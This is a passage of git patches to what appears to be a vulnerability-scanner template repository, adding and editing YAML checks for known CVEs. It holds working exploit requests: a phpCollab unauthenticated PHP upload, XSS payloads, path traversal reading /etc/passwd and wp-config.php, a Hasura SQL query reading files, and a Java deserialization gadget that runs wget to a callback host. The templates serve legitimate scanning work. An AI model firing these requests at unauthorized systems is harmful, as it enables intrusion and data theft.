reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090 + +requests: + - raw: + - | # REQUEST 1 + POST /clients/editclient.php?id=1&action=update HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 + Accept-Encoding: gzip, deflate + DNT: 1 + Connection: close + Upgrade-Insecure-Requests: 1 + Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 + Content-Length: 237 + + -----------------------------154934846911423734231554128137 + Content-Disposition: form-data; name="upload"; filename="backdoor.php" + Content-Type: application/x-php + + + + -----------------------------154934846911423734231554128137-- + + - | # REQUEST 2 + GET /logos_clients/1.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept-Encoding: gzip + + matchers-condition: and + matchers: + - type: word + words: + - "phpinfo()" + - "PHP Version" + part: body + + - type: status + status: + - 200 From 5b9570c2c0466d30cd3afe980ba54ee0f549f88c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 17:00:12 +0700 Subject: [PATCH 1218/4083] Create phpCollab-detect.yaml --- technologies/phpCollab-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/phpCollab-detect.yaml diff --git a/technologies/phpCollab-detect.yaml b/technologies/phpCollab-detect.yaml new file mode 100644 index 0000000000..923d4a8257 --- /dev/null +++ b/technologies/phpCollab-detect.yaml @@ -0,0 +1,25 @@ +id: phpCollab-detect + +info: + name: PhpCollab detect + author: pikpikcu + severity: info + tags: tech,phpCollab + +requests: + - method: GET + path: + - "{{BaseURL}}/general/login.php" + + matchers: + - type: regex + part: body + regex: + - 'PhpCollab' + + extractors: + - type: regex + part: body + group: 1 + regex: + - '' From fb055acf9ebb8d728ddede2cb4ea0a5a29de9102 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 17:27:42 +0700 Subject: [PATCH 1219/4083] Create CVE-2016-7981.yaml --- cves/2016/CVE-2016-7981.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2016/CVE-2016-7981.yaml diff --git a/cves/2016/CVE-2016-7981.yaml b/cves/2016/CVE-2016-7981.yaml new file mode 100644 index 0000000000..b08e1752ad --- /dev/null +++ b/cves/2016/CVE-2016-7981.yaml @@ -0,0 +1,31 @@ +id: CVE-2016-7981 + +info: + name: SPIP 3.1.2 XSS. + author: pikpikcu + severity: medium + description: | + Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action. + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981 + tags: cve,cve2016,xss,spip + +requests: + - method: GET + path: + - "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html From 2b2a0069a46008e88feefa0254ab9217c32c931b Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 27 Jul 2021 16:29:17 +0530 Subject: [PATCH 1220/4083] format update --- iot/qvisdvr-deserialization-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/iot/qvisdvr-deserialization-rce.yaml b/iot/qvisdvr-deserialization-rce.yaml index 9d77efad68..dfbd247782 100644 --- a/iot/qvisdvr-deserialization-rce.yaml +++ b/iot/qvisdvr-deserialization-rce.yaml @@ -27,7 +27,7 @@ requests: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded - javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}")}} + javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}} extractors: - type: regex From 4906cecd0b9d0ce976a85eca77f65bcd39d69e11 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 16:29:18 +0530 Subject: [PATCH 1221/4083] Update bigbluebutton-detect.yaml --- technologies/bigbluebutton-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/bigbluebutton-detect.yaml b/technologies/bigbluebutton-detect.yaml index 14400cabf6..bfe8188152 100644 --- a/technologies/bigbluebutton-detect.yaml +++ b/technologies/bigbluebutton-detect.yaml @@ -18,7 +18,7 @@ requests: part: body words: - "BigBlueButton" - condition: and + - type: status status: - 200 From d9f20b63e4686ac7d00f7437498d1a6399390db9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 16:32:50 +0530 Subject: [PATCH 1222/4083] Update CVE-2020-27735.yaml --- cves/2020/CVE-2020-27735.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-27735.yaml b/cves/2020/CVE-2020-27735.yaml index 7218539596..31b0f18651 100644 --- a/cves/2020/CVE-2020-27735.yaml +++ b/cves/2020/CVE-2020-27735.yaml @@ -12,13 +12,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/help/english/index.html?javascript:alert('{{randstr}}')" + - "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)" matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: status From d561a8711d36810d2fd41910729286255d040282 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 18:19:44 +0700 Subject: [PATCH 1223/4083] Create CVE-2020-26153.yaml --- cves/2020/CVE-2020-26153.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2020/CVE-2020-26153.yaml diff --git a/cves/2020/CVE-2020-26153.yaml b/cves/2020/CVE-2020-26153.yaml new file mode 100644 index 0000000000..adb560652f --- /dev/null +++ b/cves/2020/CVE-2020-26153.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-26153 + +info: + name: Event Espresso Core-Reg XSS + author: pikpikcu + severity: medium + description: | + cross-site scripting (XSS) vulnerability in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php in the Event Espresso Core plugin before 4.10.7.p for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-26153 + tags: cve,cve2020,xss,event-espresso-core-reg,wordpress + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Cb" + + matchers-condition: and + matchers: + - type: word + words: + - '"/>' + part: body + + - type: status + status: + - 500 + + - type: word + part: header + words: + - text/html From 590e6ae17239ead1222d7acd5157b24bda50646b Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 27 Jul 2021 18:36:29 +0700 Subject: [PATCH 1224/4083] Create CVE-2017-15647.yaml --- cves/2017/CVE-2017-15647.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2017/CVE-2017-15647.yaml diff --git a/cves/2017/CVE-2017-15647.yaml b/cves/2017/CVE-2017-15647.yaml new file mode 100644 index 0000000000..263e4b2bf9 --- /dev/null +++ b/cves/2017/CVE-2017-15647.yaml @@ -0,0 +1,27 @@ +id: CVE-2017-15647 + +info: + name: FiberHome - Directory Traversal + author: daffainfo + severity: medium + description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. + reference: | + - https://www.exploit-db.com/exploits/44054 + - https://www.cvedetails.com/cve/CVE-2017-15647 + tags: cve,cve2017,lfi,router + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 142eb2fe3b529291862b0efd96d9433a0eb23545 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 17:12:32 +0530 Subject: [PATCH 1225/4083] Update CVE-2020-9036.yaml --- cves/2020/CVE-2020-9036.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-9036.yaml b/cves/2020/CVE-2020-9036.yaml index 1b757a456f..30caec3bae 100644 --- a/cves/2020/CVE-2020-9036.yaml +++ b/cves/2020/CVE-2020-9036.yaml @@ -1,10 +1,12 @@ id: CVE-2020-9036 info: - name: Jeedom through 4.0.38 allows XSS. + name: Jeedom through 4.0.38 allows XSS author: pikpikcu severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9036 + reference: | + - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-9036 tags: cve,cve2020,xss,jeedom requests: @@ -16,7 +18,7 @@ requests: matchers: - type: word words: - - 'alert(document.domain)' + - '' part: body - type: status From cdb91d44f3335d21cfd688e267f7e7cd40d2f17f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 17:20:54 +0530 Subject: [PATCH 1226/4083] Update CVE-2020-26153.yaml --- cves/2020/CVE-2020-26153.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/cves/2020/CVE-2020-26153.yaml b/cves/2020/CVE-2020-26153.yaml index adb560652f..35c649d8e1 100644 --- a/cves/2020/CVE-2020-26153.yaml +++ b/cves/2020/CVE-2020-26153.yaml @@ -6,19 +6,21 @@ info: severity: medium description: | cross-site scripting (XSS) vulnerability in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php in the Event Espresso Core plugin before 4.10.7.p for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-26153 - tags: cve,cve2020,xss,event-espresso-core-reg,wordpress + reference: | + - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-26153 + tags: cve,cve2020,xss,wordpress,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Cb" + - "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb" matchers-condition: and matchers: - type: word words: - - '"/>' + - '"/>' part: body - type: status From 0ce590a3f2774f4f134927082f46800c9447111c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 17:23:32 +0530 Subject: [PATCH 1227/4083] Update CVE-2016-7981.yaml --- cves/2016/CVE-2016-7981.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2016/CVE-2016-7981.yaml b/cves/2016/CVE-2016-7981.yaml index b08e1752ad..9f543433f5 100644 --- a/cves/2016/CVE-2016-7981.yaml +++ b/cves/2016/CVE-2016-7981.yaml @@ -1,7 +1,7 @@ id: CVE-2016-7981 info: - name: SPIP 3.1.2 XSS. + name: SPIP 3.1.2 XSS author: pikpikcu severity: medium description: | @@ -12,13 +12,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '">' + - '">' part: body - type: status From b45aeafe313b91c7a92ffd2c4977fb431d6da783 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 17:24:58 +0530 Subject: [PATCH 1228/4083] Update and rename phpCollab-detect.yaml to phpcollab-detect.yaml --- .../{phpCollab-detect.yaml => phpcollab-detect.yaml} | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) rename technologies/{phpCollab-detect.yaml => phpcollab-detect.yaml} (81%) diff --git a/technologies/phpCollab-detect.yaml b/technologies/phpcollab-detect.yaml similarity index 81% rename from technologies/phpCollab-detect.yaml rename to technologies/phpcollab-detect.yaml index 923d4a8257..6bfc4b094e 100644 --- a/technologies/phpCollab-detect.yaml +++ b/technologies/phpcollab-detect.yaml @@ -1,10 +1,10 @@ -id: phpCollab-detect +id: phpcollab-detect info: name: PhpCollab detect author: pikpikcu severity: info - tags: tech,phpCollab + tags: tech,phpcollab requests: - method: GET @@ -12,9 +12,9 @@ requests: - "{{BaseURL}}/general/login.php" matchers: - - type: regex + - type: word part: body - regex: + words: - 'PhpCollab' extractors: From 870339ebe1e42c5fc89e0f2c53bc0f99c122dc95 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 19:10:51 +0700 Subject: [PATCH 1229/4083] Update CVE-2017-6090.yaml --- cves/2017/CVE-2017-6090.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml index 81ec20fdd7..3d86abc295 100644 --- a/cves/2017/CVE-2017-6090.yaml +++ b/cves/2017/CVE-2017-6090.yaml @@ -10,7 +10,7 @@ info: requests: - raw: - | # REQUEST 1 - POST /clients/editclient.php?id=1&action=update HTTP/1.1 + POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 @@ -22,7 +22,7 @@ requests: Content-Length: 237 -----------------------------154934846911423734231554128137 - Content-Disposition: form-data; name="upload"; filename="backdoor.php" + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php" Content-Type: application/x-php @@ -30,10 +30,9 @@ requests: -----------------------------154934846911423734231554128137-- - | # REQUEST 2 - GET /logos_clients/1.php HTTP/1.1 + GET /logos_clients/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip matchers-condition: and matchers: From 448aec1edb1ab34ce4ac18428fac35ae021d1ae2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 27 Jul 2021 17:50:49 +0530 Subject: [PATCH 1230/4083] minor updates --- cves/2017/CVE-2017-6090.yaml | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml index 81ec20fdd7..b913e34a0e 100644 --- a/cves/2017/CVE-2017-6090.yaml +++ b/cves/2017/CVE-2017-6090.yaml @@ -4,7 +4,7 @@ info: name: PhpCollab (unauthenticated) Arbitrary File Upload author: pikpikcu severity: critical - tags: cve,cve2017,phpCollab,rce + tags: cve,cve2017,phpcollab,rce,fileupload reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090 requests: @@ -22,10 +22,10 @@ requests: Content-Length: 237 -----------------------------154934846911423734231554128137 - Content-Disposition: form-data; name="upload"; filename="backdoor.php" + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php" Content-Type: application/x-php - + -----------------------------154934846911423734231554128137-- @@ -38,10 +38,9 @@ requests: matchers-condition: and matchers: - type: word - words: - - "phpinfo()" - - "PHP Version" part: body + words: + - "48dbd2384cb6b996fa1e2855c7f0567f" - type: status status: From d43a54ada1afd41f196c9cdb53c6d32c906fa34f Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 27 Jul 2021 17:56:56 +0530 Subject: [PATCH 1231/4083] Update CVE-2017-6090.yaml --- cves/2017/CVE-2017-6090.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml index 570cb6624f..74188b3b6d 100644 --- a/cves/2017/CVE-2017-6090.yaml +++ b/cves/2017/CVE-2017-6090.yaml @@ -30,7 +30,7 @@ requests: -----------------------------154934846911423734231554128137-- - | # REQUEST 2 - GET /logos_clients/{{randstr}}.php HTTP/1.1 + GET /logos_clients/1.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 From b984f86d676734002593a974c6e2eb3aabe5a7b1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 27 Jul 2021 17:59:13 +0530 Subject: [PATCH 1232/4083] removing extra headers --- cves/2017/CVE-2017-6090.yaml | 8 -------- 1 file changed, 8 deletions(-) diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml index 74188b3b6d..f9c76aab23 100644 --- a/cves/2017/CVE-2017-6090.yaml +++ b/cves/2017/CVE-2017-6090.yaml @@ -12,14 +12,7 @@ requests: - | # REQUEST 1 POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: gzip, deflate - DNT: 1 - Connection: close - Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 - Content-Length: 237 -----------------------------154934846911423734231554128137 Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php" @@ -32,7 +25,6 @@ requests: - | # REQUEST 2 GET /logos_clients/1.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 matchers-condition: and matchers: From 2219ab607e14dc95c1d0aaf2973512234dada2e3 Mon Sep 17 00:00:00 2001 From: lulz <39673284+Udyz@users.noreply.github.com> Date: Tue, 27 Jul 2021 21:57:59 +0700 Subject: [PATCH 1233/4083] Create raw-psql-warp.yaml --- vulnerabilities/other/raw-psql-warp.yaml | 55 ++++++++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 vulnerabilities/other/raw-psql-warp.yaml diff --git a/vulnerabilities/other/raw-psql-warp.yaml b/vulnerabilities/other/raw-psql-warp.yaml new file mode 100644 index 0000000000..71552503a7 --- /dev/null +++ b/vulnerabilities/other/raw-psql-warp.yaml @@ -0,0 +1,55 @@ +id: raw-psql-warp + +info: + author: Udyz + name: Warp 3.X.XX - Unauthencation lead to psql query exec + severity: critical + reference: + tags: sql,unauth,rce + +requests: + - raw: + - | + POST /v1/query HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "type": "bulk", + "source": "default", + "args":[ + { + "type": "run_sql", + "args": { + "source":"default", + "sql":"SELECT pg_read_file('/etc/passwd',0,100000);", + "cascade": false, + "read_only": false + } + } + ] + } + - | + POST /v2/query HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "type": "bulk", + "source": "default", + "args":[ + { + "type": "run_sql", + "args": { + "source":"default", + "sql":"SELECT pg_read_file('/etc/passwd',0,100000);", + "cascade": false, + "read_only": false + } + } + ] + } + matchers: + - type: regex + regex: + - "root:.*:0:0:" From 5c931f8d002587bb997a2547248fdb8d316c4f2f Mon Sep 17 00:00:00 2001 From: lulz <39673284+Udyz@users.noreply.github.com> Date: Tue, 27 Jul 2021 22:12:41 +0700 Subject: [PATCH 1234/4083] Update raw-psql-warp.yaml --- vulnerabilities/other/raw-psql-warp.yaml | 21 +-------------------- 1 file changed, 1 insertion(+), 20 deletions(-) diff --git a/vulnerabilities/other/raw-psql-warp.yaml b/vulnerabilities/other/raw-psql-warp.yaml index 71552503a7..5ca49f4b33 100644 --- a/vulnerabilities/other/raw-psql-warp.yaml +++ b/vulnerabilities/other/raw-psql-warp.yaml @@ -9,26 +9,6 @@ info: requests: - raw: - - | - POST /v1/query HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - { - "type": "bulk", - "source": "default", - "args":[ - { - "type": "run_sql", - "args": { - "source":"default", - "sql":"SELECT pg_read_file('/etc/passwd',0,100000);", - "cascade": false, - "read_only": false - } - } - ] - } - | POST /v2/query HTTP/1.1 Host: {{Hostname}} @@ -49,6 +29,7 @@ requests: } ] } + matchers: - type: regex regex: From dafd8d3e71e443b211bea1512d91f6702c74d0a8 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 27 Jul 2021 11:07:18 -0500 Subject: [PATCH 1235/4083] Create github-personal-token.yaml --- file/keys/github-personal-token.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 file/keys/github-personal-token.yaml diff --git a/file/keys/github-personal-token.yaml b/file/keys/github-personal-token.yaml new file mode 100644 index 0000000000..ac9983c6b6 --- /dev/null +++ b/file/keys/github-personal-token.yaml @@ -0,0 +1,16 @@ +id: github-personal-token + +info: + name: Github Personal Token + author: geeknik + severity: high + tags: token,file + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "ghp_.{36}" From 7d200d70286eed698afde6c7d2b201c138ac9f74 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 27 Jul 2021 21:43:39 +0530 Subject: [PATCH 1236/4083] removed extra headers --- iot/qvisdvr-deserialization-rce.yaml | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/iot/qvisdvr-deserialization-rce.yaml b/iot/qvisdvr-deserialization-rce.yaml index dfbd247782..0d82eb387e 100644 --- a/iot/qvisdvr-deserialization-rce.yaml +++ b/iot/qvisdvr-deserialization-rce.yaml @@ -12,19 +12,11 @@ requests: - | GET /qvisdvr/ HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9 Content-Type: application/x-www-form-urlencoded + - | POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Content-Length: 1884 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Connection: close - User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}} From 070682339997c33cc64a2cf705cfa589d8ba426d Mon Sep 17 00:00:00 2001 From: lulz <39673284+Udyz@users.noreply.github.com> Date: Tue, 27 Jul 2021 23:23:55 +0700 Subject: [PATCH 1237/4083] Update raw-psql-warp.yaml --- vulnerabilities/other/raw-psql-warp.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/other/raw-psql-warp.yaml b/vulnerabilities/other/raw-psql-warp.yaml index 5ca49f4b33..3a6a332c7c 100644 --- a/vulnerabilities/other/raw-psql-warp.yaml +++ b/vulnerabilities/other/raw-psql-warp.yaml @@ -1,11 +1,11 @@ -id: raw-psql-warp +id: hasura-graphql-psql-exec info: author: Udyz - name: Warp 3.X.XX - Unauthencation lead to psql query exec + name: Hasura GraphQL Engine - postgresql query exec severity: critical - reference: - tags: sql,unauth,rce + reference: https://github.com/projectdiscovery/nuclei-templates/blob/53bed168cce5619e18b991c56779d4ce31ce153f/vulnerabilities/other/hasura-graphql-ssrf.yaml + tags: hasura,rce requests: - raw: From 0c68ef5f669592103b2d5ede7fac1b91a4ec3248 Mon Sep 17 00:00:00 2001 From: lulz <39673284+Udyz@users.noreply.github.com> Date: Tue, 27 Jul 2021 23:25:36 +0700 Subject: [PATCH 1238/4083] Rename raw-psql-warp.yaml to hasura-graphql-psql-exec.yaml --- .../other/{raw-psql-warp.yaml => hasura-graphql-psql-exec.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/other/{raw-psql-warp.yaml => hasura-graphql-psql-exec.yaml} (100%) diff --git a/vulnerabilities/other/raw-psql-warp.yaml b/vulnerabilities/other/hasura-graphql-psql-exec.yaml similarity index 100% rename from vulnerabilities/other/raw-psql-warp.yaml rename to vulnerabilities/other/hasura-graphql-psql-exec.yaml From e8565eb82c0293f9e3e7a9065fb642bbb44f4327 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 27 Jul 2021 14:26:04 -0500 Subject: [PATCH 1239/4083] Update private-key.yaml --- file/keys/private-key.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/file/keys/private-key.yaml b/file/keys/private-key.yaml index 7149e7400e..3e779effd4 100644 --- a/file/keys/private-key.yaml +++ b/file/keys/private-key.yaml @@ -2,7 +2,7 @@ id: private-key info: name: Private Key Detect - author: gaurang + author: gaurang,geeknik severity: high tags: token,file @@ -19,4 +19,6 @@ file: - "\"BEGIN DSA PRIVATE KEY\"" - "\"BEGIN EC PRIVATE KEY\"" - "\"BEGIN PGP PRIVATE KEY BLOCK\"" - - "\"ssh-rsa\"" \ No newline at end of file + - "\"ssh-rsa\"" + - "\"ssh-dsa\"" + - "\"ssh-ed25519\"" From 0341b58077e16c1349fa24c4043bf09627139b77 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 28 Jul 2021 05:02:29 +0700 Subject: [PATCH 1240/4083] Create CVE-2009-5114.yaml --- cves/2009/CVE-2009-5114.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2009/CVE-2009-5114.yaml diff --git a/cves/2009/CVE-2009-5114.yaml b/cves/2009/CVE-2009-5114.yaml new file mode 100644 index 0000000000..557037e9ed --- /dev/null +++ b/cves/2009/CVE-2009-5114.yaml @@ -0,0 +1,27 @@ +id: CVE-2009-5114 + +info: + name: WebGlimpse 2.18.7 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. + reference: | + - https://www.exploit-db.com/exploits/36994 + - https://www.cvedetails.com/cve/CVE-2009-5114 + tags: cve,cve2009,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From a07d931799caca3d06e6517bce0aefed303ba8c0 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 28 Jul 2021 05:03:23 +0700 Subject: [PATCH 1241/4083] Create CVE-2014-8799.yaml --- cves/2014/CVE-2014-8799.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2014/CVE-2014-8799.yaml diff --git a/cves/2014/CVE-2014-8799.yaml b/cves/2014/CVE-2014-8799.yaml new file mode 100644 index 0000000000..6898342c4e --- /dev/null +++ b/cves/2014/CVE-2014-8799.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-8799 + +info: + name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. + reference: | + - https://www.exploit-db.com/exploits/35346 + - https://www.cvedetails.com/cve/CVE-2014-8799 + tags: cve,cve2014,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php" + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 2bc6cc018f920e1ef99b90706ec91fa1f1900e72 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 28 Jul 2021 07:13:33 +0700 Subject: [PATCH 1242/4083] Create CVE-2011-4336.yaml --- cves/2011/CVE-2011-4336.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2011/CVE-2011-4336.yaml diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml new file mode 100644 index 0000000000..728e971575 --- /dev/null +++ b/cves/2011/CVE-2011-4336.yaml @@ -0,0 +1,33 @@ +id: CVE-2011-4336 + +info: + name: Tiki Wiki 